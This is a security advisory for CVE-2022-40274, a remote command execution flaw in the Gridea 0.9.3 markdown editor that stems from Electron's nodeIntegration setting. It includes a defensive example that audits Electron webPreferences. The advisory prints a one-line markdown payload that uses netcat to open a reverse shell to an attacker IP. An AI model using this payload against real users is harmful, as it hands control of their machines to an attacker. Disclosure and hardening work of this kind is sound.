Gridea 0.9.3 - RCE via nodeIntegration feature
| Name | Gridea 0.9.3 - RCE via nodeIntegration feature |
| Affected versions | Version 0.9.3 |
| Kind | Remote command execution |
| Rule | 004. Remote command execution |
| CVSSv3 Base Score | 8.6 |
Gridea version 0.9.3 allows an external attacker to execute arbitrary code remotely on any client that views a malicious markdown file through Gridea.
This vulnerability occurs because the application has the "nodeIntegration" option enabled, so JavaScript rendered in the preview can call Node.js APIs. An attacker can therefore embed malicious JS code in a markdown file and send it to the victim; viewing the file results in RCE.
To exploit this vulnerability, you must send the following file to a user to open with Gridea. The exploit is triggered when the user presses "CTRL+P" or simply clicks "preview".
<img src=1 onerror="require('child_process').exec('nc 192.168.20.38 4444 -e /bin/bash');"/>
Evidence of exploitation
Our security policy
We have reserved the CVE-2022-40274 to refer to this issue from now on.
Version: Gridea 0.9.3
Operating System: GNU/Linux
There is currently no patch available for this vulnerability.
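The class of setting this advisory names can be checked in any Electron application before release. The following is an added example, not code from the advisory or from Gridea: it audits a `webPreferences` object for options that expose Node.js APIs to rendered content, with a weak configuration beside a corrected one. The option names are Electron's; the `RULES` table, `auditWebPreferences` and both sample objects are assumptions constructed for illustration.

```javascript
'use strict';

// Electron webPreferences options, the value treated as safe here, and why.
// pin: true means "require an explicit value", because the default for that
// option has changed across Electron releases.
const RULES = [
  { key: 'nodeIntegration', safe: false, why: 'page script can require() Node.js modules' },
  { key: 'nodeIntegrationInWorker', safe: false, why: 'web workers get Node.js APIs' },
  { key: 'nodeIntegrationInSubFrames', safe: false, why: 'sub-frames get Node.js support' },
  { key: 'contextIsolation', safe: true, pin: true, why: 'page shares a JS context with preload code' },
  { key: 'sandbox', safe: true, pin: true, why: 'renderer runs outside the Chromium sandbox' },
  { key: 'webSecurity', safe: true, why: 'same-origin policy is switched off' },
];

// Returns [{ key, status, why }] for every option that is explicitly unsafe,
// or that is pinned by RULES but missing from prefs.
function auditWebPreferences(prefs = {}) {
  const findings = [];
  for (const { key, safe, pin, why } of RULES) {
    const present = Object.prototype.hasOwnProperty.call(prefs, key);
    if (present && prefs[key] !== safe) {
      findings.push({ key, status: 'unsafe', why });
    } else if (!present && pin) {
      findings.push({ key, status: 'unset', why: `set ${key}: ${safe} explicitly` });
    }
  }
  return findings;
}

// Constructed sample: mirrors the option the advisory names, not Gridea's source.
const weakPrefs = { nodeIntegration: true, contextIsolation: false };

// Constructed sample: the corrected counterpart, every audited option pinned.
const hardenedPrefs = {
  nodeIntegration: false,
  nodeIntegrationInWorker: false,
  nodeIntegrationInSubFrames: false,
  contextIsolation: true,
  sandbox: true,
  webSecurity: true,
};

for (const f of auditWebPreferences(weakPrefs)) {
  console.log(`${f.status.toUpperCase()} ${f.key}: ${f.why}`);
}
```

An empty findings list for the object passed to `new BrowserWindow({ webPreferences })` is the condition to enforce in review or CI.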
The vulnerability was discovered by Carlos Bello from the Offensive
Vendor page https://github.com/getgridea/gridea